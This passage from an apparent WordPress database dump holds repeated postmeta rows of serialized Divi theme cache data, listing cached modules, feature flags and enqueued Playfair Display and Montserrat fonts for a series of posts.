s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33744,554,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33745,554,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33746,554,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33747,554,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33748,556,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33749,556,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33750,556,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33739,551,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33740,553,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33741,553,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33742,553,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33736,551,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33737,551,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33738,551,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33732,548,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33733,548,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33734,548,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33735,548,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33728,547,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33729,547,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33730,547,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33731,547,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33724,546,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33725,546,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33726,546,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33727,546,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33720,545,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33721,545,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33722,545,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33723,545,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33716,543,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33717,543,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33718,543,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33719,543,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33712,540,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33713,540,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33714,540,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33715,540,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33707,538,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33708,539,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33709,539,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33710,539,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33711,539,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33704,538,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33705,538,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33706,538,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33700,537,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33701,537,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33702,537,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33703,537,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33696,536,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33697,536,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33698,536,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33699,536,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,